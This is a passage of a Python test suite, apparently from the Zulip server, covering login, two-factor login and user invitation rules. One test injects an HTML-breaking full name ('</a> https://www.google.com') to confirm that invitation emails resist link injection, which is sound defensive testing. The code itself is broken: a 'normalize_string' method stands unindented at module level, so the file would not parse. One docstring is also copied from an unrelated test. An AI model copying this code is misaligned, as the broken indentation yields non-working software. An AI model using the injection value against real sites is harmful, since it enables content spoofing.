        result = self.login_with_return(self.example_email("hamlet"), subdomain="zulip")
        self.assertEqual(result.status_code, 302)
        self.assertEqual('/accounts/deactivated/', result.url)
    def test_logout(self) -> None:
        """Logging out via the API endpoint clears the session."""
        self.login('hamlet')
        # We use the logout API, not self.logout, to make sure we test
        # the actual logout code path.
        self.client_post('/accounts/logout/')
        self.assert_logged_in_user_id(None)
    def test_non_ascii_login(self) -> None:
        """
        You can log in even if your password contain non-ASCII characters.
        """
        email = self.nonreg_email('test')
        password = "hümbüǵ"
        # Registering succeeds.
        self.register(email, password)
        user_profile = self.nonreg_user('test')
        self.assert_logged_in_user_id(user_profile.id)
        self.logout()
        self.assert_logged_in_user_id(None)
        # Logging in succeeds.
        self.logout()
        self.login_by_email(email, password)
        self.assert_logged_in_user_id(user_profile.id)
    @override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=False)
    def test_login_page_redirects_logged_in_user(self) -> None:
        """You will be redirected to the app's main page if you land on the
        login page when already logged in.
        """
        self.login('cordelia')
        response = self.client_get("/login/")
        # Redirect goes to the realm's root (the webapp), not back to /login/.
        self.assertEqual(response["Location"], "http://zulip.testserver")
    def test_options_request_to_login_page(self) -> None:
        """An HTTP OPTIONS request to the login page is answered successfully."""
        response = self.client_options('/login/')
        self.assertEqual(response.status_code, 200)
    @override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=True)
    def test_login_page_redirects_logged_in_user_under_2fa(self) -> None:
        """You will be redirected to the app's main page if you land on the
        login page when already logged in.
        """
        user_profile = self.example_user("cordelia")
        # With 2FA enabled, the user must also pass the second factor before
        # being treated as fully logged in.
        self.create_default_device(user_profile)
        self.login('cordelia')
        self.login_2fa(user_profile)
        response = self.client_get("/login/")
        self.assertEqual(response["Location"], "http://zulip.testserver")
    def test_start_two_factor_auth(self) -> None:
        """start_two_factor_auth delegates to django-two-factor's login view."""
        request = MagicMock(POST=dict())
        with patch('zerver.views.auth.TwoFactorLoginView') as mock_view:
            # Replace the class-based view with a stub returning a plain response.
            mock_view.as_view.return_value = lambda *a, **k: HttpResponse()
            response = start_two_factor_auth(request)
            self.assertTrue(isinstance(response, HttpResponse))
    def test_do_two_factor_login(self) -> None:
        """do_two_factor_login invokes django_otp's login exactly once."""
        user_profile = self.example_user('hamlet')
        self.create_default_device(user_profile)
        request = MagicMock()
        with patch('zerver.decorator.django_otp.login') as mock_login:
            do_two_factor_login(request, user_profile)
            mock_login.assert_called_once()
    def test_zulip_default_context_does_not_load_inline_previews(self) -> None:
        """A bare image URL in the realm description must be rendered as a
        plain link, never as an inline image preview, on the login page."""
        realm = get_realm("zulip")
        description = "https://www.google.com/images/srpr/logo4w.png"
        realm.description = description
        realm.save(update_fields=["description"])
        response = self.client_get("/login/")
        expected_response = """<p><a href="https://www.google.com/images/srpr/logo4w.png">\
https://www.google.com/images/srpr/logo4w.png</a></p>"""
        self.assertEqual(response.context_data["realm_description"], expected_response)
        self.assertEqual(response.status_code, 200)
class InviteUserBase(ZulipTestCase):
    """Shared helpers for the invitation test cases below."""

    def check_sent_emails(self, correct_recipients: List[str],
                          custom_from_name: Optional[str]=None) -> None:
        """Assert that exactly `correct_recipients` received invitation emails,
        optionally checking the From display name of the first one."""
        from django.core.mail import outbox
        self.assertEqual(len(outbox), len(correct_recipients))
        email_recipients = [email.recipients()[0] for email in outbox]
        self.assertEqual(sorted(email_recipients), sorted(correct_recipients))
        if len(outbox) == 0:
            return
        if custom_from_name is not None:
            self.assertIn(custom_from_name, outbox[0].from_email)
        # The From address itself must be a tokenized noreply address.
        self.assertRegex(outbox[0].from_email, fr" <{self.TOKENIZED_NOREPLY_REGEX}>\Z")

    def invite(self, invitee_emails: str, stream_names: Sequence[str], body: str='',
               invite_as: int=PreregistrationUser.INVITE_AS['MEMBER']) -> HttpResponse:
        """
        Invites the specified users to Zulip with the specified streams.

        users should be a string containing the users to invite, comma or
        newline separated.

        streams should be a list of strings.
        """
        stream_ids = []
        for stream_name in stream_names:
            stream_ids.append(self.get_stream_id(stream_name))
        return self.client_post("/json/invites",
                                {"invitee_emails": invitee_emails,
                                 "stream_ids": ujson.dumps(stream_ids),
                                 "invite_as": invite_as})
class InviteUserTest(InviteUserBase):
    def test_successful_invite_user(self) -> None:
        """
        A call to /json/invites with valid parameters causes an invitation
        email to be sent.
        """
        self.login('hamlet')
        invitee = "alice-test@zulip.com"
        self.assert_json_success(self.invite(invitee, ["Denmark"]))
        # A confirmation key must exist and the email must carry the
        # inviter's name in the From line.
        self.assertTrue(find_key_by_email(invitee))
        self.check_sent_emails([invitee], custom_from_name="Hamlet")
    def test_newbie_restrictions(self) -> None:
        """Users younger than INVITES_MIN_USER_AGE_DAYS may not send invites."""
        user_profile = self.example_user('hamlet')
        invitee = "alice-test@zulip.com"
        stream_name = 'Denmark'
        self.login_user(user_profile)
        result = self.invite(invitee, [stream_name])
        self.assert_json_success(result)
        # Age the account to 10 days, then test both sides of the threshold.
        user_profile.date_joined = timezone_now() - datetime.timedelta(days=10)
        user_profile.save()
        with self.settings(INVITES_MIN_USER_AGE_DAYS=5):
            result = self.invite(invitee, [stream_name])
            self.assert_json_success(result)
        with self.settings(INVITES_MIN_USER_AGE_DAYS=15):
            result = self.invite(invitee, [stream_name])
            self.assert_json_error_contains(result, "Your account is too new")
    def test_invite_limits(self) -> None:
        """Exercise the daily invitation rate limits for new and old realms."""
        user_profile = self.example_user('hamlet')
        realm = user_profile.realm
        stream_name = 'Denmark'
        # These constants only need to be in descending order
        # for this test to trigger an InvitationError based
        # on max daily counts.
        site_max = 50
        realm_max = 40
        num_invitees = 30
        max_daily_count = 20
        daily_counts = [(1, max_daily_count)]
        invite_emails = [
            f'foo-{i:02}@zulip.com'
            for i in range(num_invitees)
        ]
        invitees = ','.join(invite_emails)
        self.login_user(user_profile)
        realm.max_invites = realm_max
        realm.date_created = timezone_now()
        realm.save()

        def try_invite() -> HttpResponse:
            # Helper: attempt the invite under the limit-related settings.
            with self.settings(OPEN_REALM_CREATION=True,
                               INVITES_DEFAULT_REALM_DAILY_MAX=site_max,
                               INVITES_NEW_REALM_LIMIT_DAYS=daily_counts):
                result = self.invite(invitees, [stream_name])
                return result

        result = try_invite()
        self.assert_json_error_contains(result, 'enough remaining invites')

        # Next show that aggregate limits expire once the realm is old
        # enough.
        realm.date_created = timezone_now() - datetime.timedelta(days=8)
        realm.save()
        with queries_captured() as queries:
            result = try_invite()
        # TODO: Fix large query count here.
        #
        # TODO: There is some test OTHER than this one
        #       that is leaking some kind of state change
        #       that throws off the query count here.  It
        #       is hard to investigate currently (due to
        #       the large number of queries), so I just
        #       use an approximate equality check.
        actual_count = len(queries)
        expected_count = 312
        if abs(actual_count - expected_count) > 1:
            raise AssertionError(f'''
                Unexpected number of queries:
                expected query count: {expected_count}
                actual: {actual_count}
                ''')
        self.assert_json_success(result)

        # Next get line coverage on bumping a realm's max_invites.
        realm.date_created = timezone_now()
        realm.max_invites = site_max + 10
        realm.save()
        result = try_invite()
        self.assert_json_success(result)

        # Finally get coverage on the case that OPEN_REALM_CREATION is False.
        with self.settings(OPEN_REALM_CREATION=False):
            result = self.invite(invitees, [stream_name])
        self.assert_json_success(result)
    def test_cross_realm_bot(self) -> None:
        """Inviting a cross-realm bot address is treated as an existing user."""
        inviter = self.example_user('hamlet')
        self.login_user(inviter)
        cross_realm_bot_email = 'emailgateway@zulip.com'
        legit_new_email = 'fred@zulip.com'
        invitee_emails = ','.join([cross_realm_bot_email, legit_new_email])
        result = self.invite(invitee_emails, ['Denmark'])
        self.assert_json_error(
            result,
            "Some of those addresses are already using Zulip," +
            " so we didn't send them an invitation." +
            " We did send invitations to everyone else!")
    def test_invite_mirror_dummy_user(self) -> None:
        '''
        A mirror dummy account is a temporary account
        that we keep in our system if we are mirroring
        data from something like Zephyr or IRC.

        We want users to eventually just sign up or
        register for Zulip, in which case we will just
        fully "activate" the account.

        Here we test that you can invite a person who
        has a mirror dummy account.
        '''
        inviter = self.example_user('hamlet')
        self.login_user(inviter)
        # Turn cordelia into an inactive mirror dummy account.
        mirror_user = self.example_user('cordelia')
        mirror_user.is_mirror_dummy = True
        mirror_user.is_active = False
        mirror_user.save()
        self.assertEqual(
            PreregistrationUser.objects.filter(email=mirror_user.email).count(),
            0,
        )
        result = self.invite(mirror_user.email, ['Denmark'])
        self.assert_json_success(result)
        # The invite creates a PreregistrationUser attributed to the inviter.
        prereg_user = PreregistrationUser.objects.get(email=mirror_user.email)
        self.assertEqual(
            prereg_user.referred_by.email,
            inviter.email,
        )
    def test_successful_invite_user_as_owner_from_owner_account(self) -> None:
        """A realm owner can invite a new user as a realm owner."""
        self.login('desdemona')
        invitee = self.nonreg_email('alice')
        result = self.invite(invitee, ["Denmark"],
                             invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER'])
        self.assert_json_success(result)
        self.assertTrue(find_key_by_email(invitee))
        self.submit_reg_form_for_user(invitee, "password")
        invitee_profile = self.nonreg_user('alice')
        self.assertTrue(invitee_profile.is_realm_owner)
        self.assertFalse(invitee_profile.is_guest)
    def test_invite_user_as_owner_from_admin_account(self) -> None:
        """Mere admins may not invite new users as realm owners."""
        self.login('iago')
        invitee = self.nonreg_email('alice')
        response = self.invite(invitee, ["Denmark"],
                               invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER'])
        self.assert_json_error(response, "Must be an organization owner")
    def test_successful_invite_user_as_admin_from_admin_account(self) -> None:
        """An admin can invite a new user as an admin (but not as owner)."""
        self.login('iago')
        invitee = self.nonreg_email('alice')
        result = self.invite(invitee, ["Denmark"],
                             invite_as=PreregistrationUser.INVITE_AS['REALM_ADMIN'])
        self.assert_json_success(result)
        self.assertTrue(find_key_by_email(invitee))
        self.submit_reg_form_for_user(invitee, "password")
        invitee_profile = self.nonreg_user('alice')
        self.assertTrue(invitee_profile.is_realm_admin)
        self.assertFalse(invitee_profile.is_realm_owner)
        self.assertFalse(invitee_profile.is_guest)
    def test_invite_user_as_admin_from_normal_account(self) -> None:
        """Non-admin members may not invite new users as admins."""
        self.login('hamlet')
        invitee = self.nonreg_email('alice')
        response = self.invite(invitee, ["Denmark"],
                               invite_as=PreregistrationUser.INVITE_AS['REALM_ADMIN'])
        self.assert_json_error(response, "Must be an organization administrator")
    def test_invite_user_as_invalid_type(self) -> None:
        """
        Test inviting a user as invalid type of user i.e. type of invite_as
        is not in PreregistrationUser.INVITE_AS
        """
        self.login('iago')
        invitee = self.nonreg_email('alice')
        # 10 is not a valid PreregistrationUser.INVITE_AS value.
        response = self.invite(invitee, ["Denmark"], invite_as=10)
        self.assert_json_error(response, "Must be invited as an valid type of user")
    def test_successful_invite_user_as_guest_from_normal_account(self) -> None:
        """A regular member can invite a new user as a guest."""
        self.login('hamlet')
        invitee = self.nonreg_email('alice')
        self.assert_json_success(self.invite(invitee, ["Denmark"],
                                             invite_as=PreregistrationUser.INVITE_AS['GUEST_USER']))
        self.assertTrue(find_key_by_email(invitee))
        self.submit_reg_form_for_user(invitee, "password")
        invitee_profile = self.nonreg_user('alice')
        self.assertFalse(invitee_profile.is_realm_admin)
        self.assertTrue(invitee_profile.is_guest)
    def test_successful_invite_user_as_guest_from_admin_account(self) -> None:
        """An admin can invite a new user as a guest."""
        self.login('iago')
        invitee = self.nonreg_email('alice')
        self.assert_json_success(self.invite(invitee, ["Denmark"],
                                             invite_as=PreregistrationUser.INVITE_AS['GUEST_USER']))
        self.assertTrue(find_key_by_email(invitee))
        self.submit_reg_form_for_user(invitee, "password")
        invitee_profile = self.nonreg_user('alice')
        self.assertFalse(invitee_profile.is_realm_admin)
        self.assertTrue(invitee_profile.is_guest)
    def test_successful_invite_user_with_name(self) -> None:
        """
        A call to /json/invites with valid parameters causes an invitation
        email to be sent.
        """
        self.login('hamlet')
        email = "alice-test@zulip.com"
        # "Name <email>" format should be parsed down to the bare address.
        invitee = f"Alice Test <{email}>"
        self.assert_json_success(self.invite(invitee, ["Denmark"]))
        self.assertTrue(find_key_by_email(email))
        self.check_sent_emails([email], custom_from_name="Hamlet")
    def test_successful_invite_user_with_name_and_normal_one(self) -> None:
        """
        A call to /json/invites with valid parameters causes an invitation
        email to be sent.
        """
        self.login('hamlet')
        email = "alice-test@zulip.com"
        email2 = "bob-test@zulip.com"
        # Mix the "Name <email>" format with a bare address in one request.
        invitee = f"Alice Test <{email}>, {email2}"
        self.assert_json_success(self.invite(invitee, ["Denmark"]))
        self.assertTrue(find_key_by_email(email))
        self.assertTrue(find_key_by_email(email2))
        self.check_sent_emails([email, email2], custom_from_name="Hamlet")
    def test_require_realm_admin(self) -> None:
        """
        The invite_by_admins_only realm setting works properly.
        """
        realm = get_realm('zulip')
        realm.invite_by_admins_only = True
        realm.save()
        # A plain member is rejected when the setting is on.
        self.login('hamlet')
        email = "alice-test@zulip.com"
        email2 = "bob-test@zulip.com"
        invitee = f"Alice Test <{email}>, {email2}"
        self.assert_json_error(self.invite(invitee, ["Denmark"]),
                               "Must be an organization administrator")
        # Now verify an administrator can do it
        self.login('iago')
        self.assert_json_success(self.invite(invitee, ["Denmark"]))
        self.assertTrue(find_key_by_email(email))
        self.assertTrue(find_key_by_email(email2))
        self.check_sent_emails([email, email2])
    def test_invite_user_signup_initial_history(self) -> None:
        """
        Test that a new user invited to a stream receives some initial
        history but only from public streams.
        """
        self.login('hamlet')
        user_profile = self.example_user('hamlet')
        private_stream_name = "Secret"
        self.make_stream(private_stream_name, invite_only=True)
        self.subscribe(user_profile, private_stream_name)
        # Seed one public and one private message before the invitee joins.
        public_msg_id = self.send_stream_message(
            self.example_user("hamlet"),
            "Denmark",
            topic_name="Public topic",
            content="Public message",
        )
        secret_msg_id = self.send_stream_message(
            self.example_user("hamlet"),
            private_stream_name,
            topic_name="Secret topic",
            content="Secret message",
        )
        invitee = self.nonreg_email('alice')
        self.assert_json_success(self.invite(invitee, [private_stream_name, "Denmark"]))
        self.assertTrue(find_key_by_email(invitee))
        self.submit_reg_form_for_user(invitee, "password")
        invitee_profile = self.nonreg_user('alice')
        invitee_msg_ids = [um.message_id for um in
                           UserMessage.objects.filter(user_profile=invitee_profile)]
        # Only the public message may appear in the invitee's history.
        self.assertTrue(public_msg_id in invitee_msg_ids)
        self.assertFalse(secret_msg_id in invitee_msg_ids)
        self.assertFalse(invitee_profile.is_realm_admin)
        # Test that exactly 2 new Zulip messages were sent, both notifications.
        last_3_messages = list(reversed(list(Message.objects.all().order_by("-id")[0:3])))
        first_msg = last_3_messages[0]
        self.assertEqual(first_msg.id, secret_msg_id)
        # The first, from notification-bot to the user who invited the new user.
        second_msg = last_3_messages[1]
        self.assertEqual(second_msg.sender.email, "notification-bot@zulip.com")
        self.assertTrue(second_msg.content.startswith(
            f"alice_zulip.com <`{invitee_profile.email}`> accepted your",
        ))
        # The second, from welcome-bot to the user who was invited.
        third_msg = last_3_messages[2]
        self.assertEqual(third_msg.sender.email, "welcome-bot@zulip.com")
        self.assertTrue(third_msg.content.startswith("Hello, and welcome to Zulip!"))
    def test_multi_user_invite(self) -> None:
        """
        Invites multiple users with a variety of delimiters.
        """
        self.login('hamlet')
        # Intentionally use a weird string.
        self.assert_json_success(self.invite(
            """bob-test@zulip.com,     carol-test@zulip.com,
            dave-test@zulip.com


            earl-test@zulip.com""", ["Denmark"]))
        for user in ("bob", "carol", "dave", "earl"):
            self.assertTrue(find_key_by_email(f"{user}-test@zulip.com"))
        self.check_sent_emails(["bob-test@zulip.com", "carol-test@zulip.com",
                                "dave-test@zulip.com", "earl-test@zulip.com"])
    def test_max_invites_model(self) -> None:
        """Realm.max_invites defaults to the site-wide setting and is persisted."""
        realm = get_realm("zulip")
        self.assertEqual(realm.max_invites, settings.INVITES_DEFAULT_REALM_DAILY_MAX)
        realm.max_invites = 3
        realm.save()
        self.assertEqual(get_realm("zulip").max_invites, 3)
        # Restore the default so later tests see a clean realm.
        realm.max_invites = settings.INVITES_DEFAULT_REALM_DAILY_MAX
        realm.save()
    def test_invite_too_many_users(self) -> None:
        # Only a light test of this pathway; e.g. doesn't test that
        # the limit gets reset after 24 hours
        self.login('iago')
        invitee_emails = "1@zulip.com, 2@zulip.com"
        self.invite(invitee_emails, ["Denmark"])
        # A second batch that would exceed the realm's daily max is rejected.
        invitee_emails = ", ".join([str(i) for i in range(get_realm("zulip").max_invites - 1)])
        self.assert_json_error(self.invite(invitee_emails, ["Denmark"]),
                               "You do not have enough remaining invites. "
                               "Please contact desdemona+admin@zulip.com to have your limit raised. "
                               "No invitations were sent.")
    def test_missing_or_invalid_params(self) -> None:
        """
        Tests inviting with various missing or invalid parameters.
        """
        realm = get_realm('zulip')
        do_set_realm_property(realm, 'emails_restricted_to_domains', True)
        self.login('hamlet')
        # Missing stream list.
        invitee_emails = "foo@zulip.com"
        self.assert_json_error(self.invite(invitee_emails, []),
                               "You must specify at least one stream for invitees to join.")
        # Malformed address and an address outside the restricted domain.
        for address in ("noatsign.com", "outsideyourdomain@example.net"):
            self.assert_json_error(
                self.invite(address, ["Denmark"]),
                "Some emails did not validate, so we didn't send any invitations.")
        self.check_sent_emails([])
        # Empty invitee list.
        self.assert_json_error(
            self.invite("", ["Denmark"]),
            "You must specify at least one email address.")
        self.check_sent_emails([])
    def test_guest_user_invitation(self) -> None:
        """
        Guest user can't invite new users
        """
        self.login('polonius')
        invitee = "alice-test@zulip.com"
        self.assert_json_error(self.invite(invitee, ["Denmark"]), "Not allowed for guest users")
        # Nothing should be created or sent on a rejected request.
        self.assertEqual(find_key_by_email(invitee), None)
        self.check_sent_emails([])
    def test_invalid_stream(self) -> None:
        """
        Tests inviting to a non-existent stream.
        """
        self.login('hamlet')
        self.assert_json_error(self.invite("iago-test@zulip.com", ["NotARealStream"]),
                               f"Stream does not exist with id: {self.INVALID_STREAM_ID}. No invites were sent.")
        self.check_sent_emails([])
    def test_invite_existing_user(self) -> None:
        """
        If you invite an address already using Zulip, no invitation is sent.
        """
        self.login('hamlet')
        # Use mixed case to also verify case-insensitive matching.
        hamlet_email = 'hAmLeT@zUlIp.com'
        result = self.invite(hamlet_email, ["Denmark"])
        self.assert_json_error(result, "We weren't able to invite anyone.")
        self.assertFalse(
            PreregistrationUser.objects.filter(email__iexact=hamlet_email).exists(),
        )
        self.check_sent_emails([])
def normalize_string(self, s: str) -> str:
s = s.strip()
return re.sub(r'\s+', ' ', s)
    def test_invite_links_in_name(self) -> None:
        """
        If you invite an address already using Zulip, no invitation is sent.
        """
        hamlet = self.example_user("hamlet")
        self.login_user(hamlet)
        # Test we properly handle links in user full names
        do_change_full_name(hamlet, "</a> https://www.google.com", hamlet)

        result = self.invite('newuser@zulip.com', ["Denmark"])
        self.assert_json_success(result)
        self.check_sent_emails(['newuser@zulip.com'])
        from django.core.mail import outbox
        body = self.normalize_string(outbox[0].alternatives[0][0])

        # Verify that one can't get Zulip to send invitation emails
        # that third-party products will linkify using the full_name
        # field, because we've included that field inside the mailto:
        # link for the sender.
        self.assertIn('<a href="mailto:hamlet@zulip.com" style="color:#46aa8f; text-decoration:underline"></a> https://www.google.com (hamlet@zulip.com)</a> wants', body)

        # TODO: Ideally, this test would also test the Invitation
        # Reminder email generated, but the test setup for that is
        # annoying.
    def test_invite_some_existing_some_new(self) -> None:
        """
        If you invite a mix of already existing and new users, invitations are
        only sent to the new users.
        """
        self.login('hamlet')
        existing = [self.example_email("hamlet"), "othello@zulip.com"]
        new = ["foo-test@zulip.com", "bar-test@zulip.com"]
        invitee_emails = "\n".join(existing + new)
        self.assert_json_error(self.invite(invitee_emails, ["Denmark"]),
                               "Some of those addresses are already using Zulip, \
so we didn't send them an invitation. We did send invitations to everyone else!")

        # We only created accounts for the new users.
        for email in existing:
            self.assertRaises(PreregistrationUser.DoesNotExist,
                              lambda: PreregistrationUser.objects.get(
                                  email=email))
        for email in new:
            self.assertTrue(PreregistrationUser.objects.get(email=email))

        # We only sent emails to the new users.
        self.check_sent_emails(new)

        prereg_user = PreregistrationUser.objects.get(email='foo-test@zulip.com')
        self.assertEqual(prereg_user.email, 'foo-test@zulip.com')
    def test_invite_outside_domain_in_closed_realm(self) -> None:
        """
        In a realm with `emails_restricted_to_domains = True`, you can't invite people
        with a different domain from that of the realm or your e-mail address.
        """
        zulip_realm = get_realm("zulip")
        zulip_realm.emails_restricted_to_domains = True
        zulip_realm.save()
        self.login('hamlet')
        external_address = "foo@example.com"
        self.assert_json_error(
            self.invite(external_address, ["Denmark"]),
            "Some emails did not validate, so we didn't send any invitations.")
    def test_invite_using_disposable_email(self) -> None:
        """
        In a realm with `disallow_disposable_email_addresses = True`, you can't invite
        people with a disposable domain.
        """
        zulip_realm = get_realm("zulip")
        zulip_realm.emails_restricted_to_domains = False
        zulip_realm.disallow_disposable_email_addresses = True
        zulip_realm.save()
        self.login('hamlet')
        # mailnator.com is on the disposable-domains blocklist.
        external_address = "foo@mailnator.com"
        self.assert_json_error(
            self.invite(external_address, ["Denmark"]),
            "Some emails did not validate, so we didn't send any invitations.")
    def test_invite_outside_domain_in_open_realm(self) -> None:
        """
        In a realm with `emails_restricted_to_domains = False`, you can invite people
        with a different domain from that of the realm or your e-mail address.
        """
        zulip_realm = get_realm("zulip")
        zulip_realm.emails_restricted_to_domains = False
        zulip_realm.save()
        self.login('hamlet')
        external_address = "foo@example.com"
        self.assert_json_success(self.invite(external_address, ["Denmark"]))
        self.check_sent_emails([external_address])
    def test_invite_outside_domain_before_closing(self) -> None:
        """
        If you invite someone with a different domain from that of the realm
        when `emails_restricted_to_domains = False`, but `emails_restricted_to_domains` later
        changes to true, the invitation should succeed but the invitee's signup
        attempt should fail.
        """
        zulip_realm = get_realm("zulip")
        zulip_realm.emails_restricted_to_domains = False
        zulip_realm.save()
        self.login('hamlet')
        external_address = "foo@example.com"
        self.assert_json_success(self.invite(external_address, ["Denmark"]))
        self.check_sent_emails([external_address])
        # Tighten the policy after the invitation went out.
        zulip_realm.emails_restricted_to_domains = True
        zulip_realm.save()
        result = self.submit_reg_form_for_user("foo@example.com", "password")
        self.assertEqual(result.status_code, 200)
        self.assert_in_response("only allows users with email addresses", result)
    def test_disposable_emails_before_closing(self) -> None:
        """
        If you invite someone with a disposable email when
        `disallow_disposable_email_addresses = False`, but
        later changes to true, the invitation should succeed
        but the invitee's signup attempt should fail.
        """
        zulip_realm = get_realm("zulip")
        zulip_realm.emails_restricted_to_domains = False
        zulip_realm.disallow_disposable_email_addresses = False
        zulip_realm.save()
        self.login('hamlet')
        external_address = "foo@mailnator.com"
        self.assert_json_success(self.invite(external_address, ["Denmark"]))
        self.check_sent_emails([external_address])
        # Tighten the policy after the invitation went out.
        zulip_realm.disallow_disposable_email_addresses = True
        zulip_realm.save()
        result = self.submit_reg_form_for_user("foo@mailnator.com", "password")
        self.assertEqual(result.status_code, 200)
        self.assert_in_response("Please sign up using a real email address.", result)
    def test_invite_with_email_containing_plus_before_closing(self) -> None:
        """
        If you invite someone with an email containing plus when
        `emails_restricted_to_domains = False`, but later change
        `emails_restricted_to_domains = True`, the invitation should
        succeed but the invitee's signup attempt should fail as
        users are not allowed to signup using email containing +
        when the realm is restricted to domain.
        """
        zulip_realm = get_realm("zulip")
        zulip_realm.emails_restricted_to_domains = False
        zulip_realm.save()
        self.login('hamlet')
        external_address = "foo+label@zulip.com"
        self.assert_json_success(self.invite(external_address, ["Denmark"]))
        self.check_sent_emails([external_address])
        # Tighten the policy after the invitation went out.
        zulip_realm.emails_restricted_to_domains = True
        zulip_realm.save()
        result = self.submit_reg_form_for_user(external_address, "password")
        self.assertEqual(result.status_code, 200)
        self.assert_in_response("Zulip Dev, does not allow signups using emails\n        that contains +", result)
    def test_invalid_email_check_after_confirming_email(self) -> None:
        """An invite whose email becomes invalid after confirmation is rejected
        at the registration form step."""
        self.login('hamlet')
        email = "test@zulip.com"
        self.assert_json_success(self.invite(email, ["Denmark"]))
        obj = Confirmation.objects.get(confirmation_key=find_key_by_email(email))
        prereg_user = obj.content_object
        # Corrupt the stored address after the confirmation was issued.
        prereg_user.email = "invalid.email"
        prereg_user.save()
        result = self.submit_reg_form_for_user(email, "password")
        self.assertEqual(result.status_code, 200)
        self.assert_in_response("The email address you are trying to sign up with is not valid", result)
    def test_invite_with_non_ascii_streams(self) -> None:
        """
        Inviting someone to streams with non-ASCII characters succeeds.
        """
        self.login('hamlet')
        invitee = "alice-test@zulip.com"
        stream_name = "hümbüǵ"
        # Make sure we're subscribed before inviting someone.
        self.subscribe(self.example_user("hamlet"), stream_name)
        self.assert_json_success(self.invite(invitee, [stream_name]))
    def test_invitation_reminder_email(self) -> None:
        """Scheduled invitation-reminder emails are delivered, and are cleared
        once the invitee actually registers."""
        from django.core.mail import outbox
        # All users belong to zulip realm
        referrer_name = 'hamlet'
        current_user = self.example_user(referrer_name)
        self.login_user(current_user)
        invitee_email = self.nonreg_email('alice')
        self.assert_json_success(self.invite(invitee_email, ["Denmark"]))
        self.assertTrue(find_key_by_email(invitee_email))
        self.check_sent_emails([invitee_email])
        data = {"email": invitee_email, "referrer_email": current_user.email}
        invitee = PreregistrationUser.objects.get(email=data["email"])
        referrer = self.example_user(referrer_name)
        link = create_confirmation_link(invitee, Confirmation.INVITATION)
        context = common_context(referrer)
        context.update({
            'activate_url': link,
            'referrer_name': referrer.full_name,
            'referrer_email': referrer.email,
            'referrer_realm_name': referrer.realm.name,
        })
        # Schedule a reminder email and verify it gets delivered.
        with self.settings(EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'):
            email = data["email"]
            send_future_email(
                "zerver/emails/invitation_reminder", referrer.realm, to_emails=[email],
                from_address=FromAddress.no_reply_placeholder, context=context)
        email_jobs_to_deliver = ScheduledEmail.objects.filter(
            scheduled_timestamp__lte=timezone_now())
        self.assertEqual(len(email_jobs_to_deliver), 1)
        email_count = len(outbox)
        for job in email_jobs_to_deliver:
            deliver_email(job)
        self.assertEqual(len(outbox), email_count + 1)
        self.assertIn(FromAddress.NOREPLY, outbox[-1].from_email)

        # Now verify that signing up clears invite_reminder emails
        with self.settings(EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'):
            email = data["email"]
            send_future_email(
                "zerver/emails/invitation_reminder", referrer.realm, to_emails=[email],
                from_address=FromAddress.no_reply_placeholder, context=context)
        email_jobs_to_deliver = ScheduledEmail.objects.filter(
            scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
        self.assertEqual(len(email_jobs_to_deliver), 1)
        self.register(invitee_email, "test")
        email_jobs_to_deliver = ScheduledEmail.objects.filter(
            scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
        self.assertEqual(len(email_jobs_to_deliver), 0)
    def test_no_invitation_reminder_when_link_expires_quickly(self) -> None:
        """No reminder email is scheduled when the invite link expires too soon
        for a reminder to be useful."""
        self.login('hamlet')
        # Check invitation reminder email is scheduled with 4 day link expiry
        with self.settings(INVITATION_LINK_VALIDITY_DAYS=4):
            self.invite('alice@zulip.com', ['Denmark'])
        self.assertEqual(ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1)
        # Check invitation reminder email is not scheduled with 3 day link expiry
        with self.settings(INVITATION_LINK_VALIDITY_DAYS=3):
            self.invite('bob@zulip.com', ['Denmark'])
        # Count is unchanged: still only the reminder from the first invite.
        self.assertEqual(ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1)
    # make sure users can't take a valid confirmation key from another
    # pathway and use it with the invitation url route
    def test_confirmation_key_of_wrong_type(self) -> None:
        email = self.nonreg_email("alice")
        realm = get_realm('zulip')
        inviter = self.example_user('iago')
        prereg_user = PreregistrationUser.objects.create(
            email=email, referred_by=inviter, realm=realm)
        url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
        registration_key = url.split('/')[-1]

        # Mainly a test of get_object_from_key, rather than of the invitation pathway
        with self.assertRaises(ConfirmationKeyException) as cm:
            get_object_from_key(registration_key, Confirmation.INVITATION)
        self.assertEqual(cm.exception.error_type, ConfirmationKeyException.DOES_NOT_EXIST)

        # Verify that using the wrong type doesn't work in the main confirm code path
        email_change_url = create_confirmation_link(prereg_user, Confirmation.EMAIL_CHANGE)
        email_change_key = email_change_url.split('/')[-1]
        url = '/accounts/do_confirm/' + email_change_key
        result = self.client_get(url)
        self.assert_in_success_response(["Whoops. We couldn't find your "
                                         "confirmation link in the system."], result)
    def test_confirmation_expired(self) -> None:
        """An expired confirmation link renders the expiration error page."""
        email = self.nonreg_email("alice")
        realm = get_realm('zulip')
        inviter = self.example_user('iago')
        prereg_user = PreregistrationUser.objects.create(
            email=email, referred_by=inviter, realm=realm)
        url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
        registration_key = url.split('/')[-1]

        # Backdate the confirmation past its validity window.
        conf = Confirmation.objects.filter(confirmation_key=registration_key).first()
        conf.date_sent -= datetime.timedelta(weeks=3)
        conf.save()
        target_url = '/' + url.split('/', 3)[3]
        result = self.client_get(target_url)
        self.assert_in_success_response(["Whoops. The confirmation link has expired "
                                         "or been deactivated."], result)
    def test_send_more_than_one_invite_to_same_user(self) -> None:
        """When one of several invites to the same address is accepted, the
        remaining invites are revoked."""
        self.user_profile = self.example_user('iago')
        streams = []
        for stream_name in ["Denmark", "Scotland"]:
            streams.append(get_stream(stream_name, self.user_profile.realm))

        # Send three separate invites to the same address.
        do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
        prereg_user = PreregistrationUser.objects.get(email="foo@zulip.com")
        do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
        do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)

        invites = PreregistrationUser.objects.filter(email__iexact="foo@zulip.com")
        self.assertEqual(len(invites), 3)

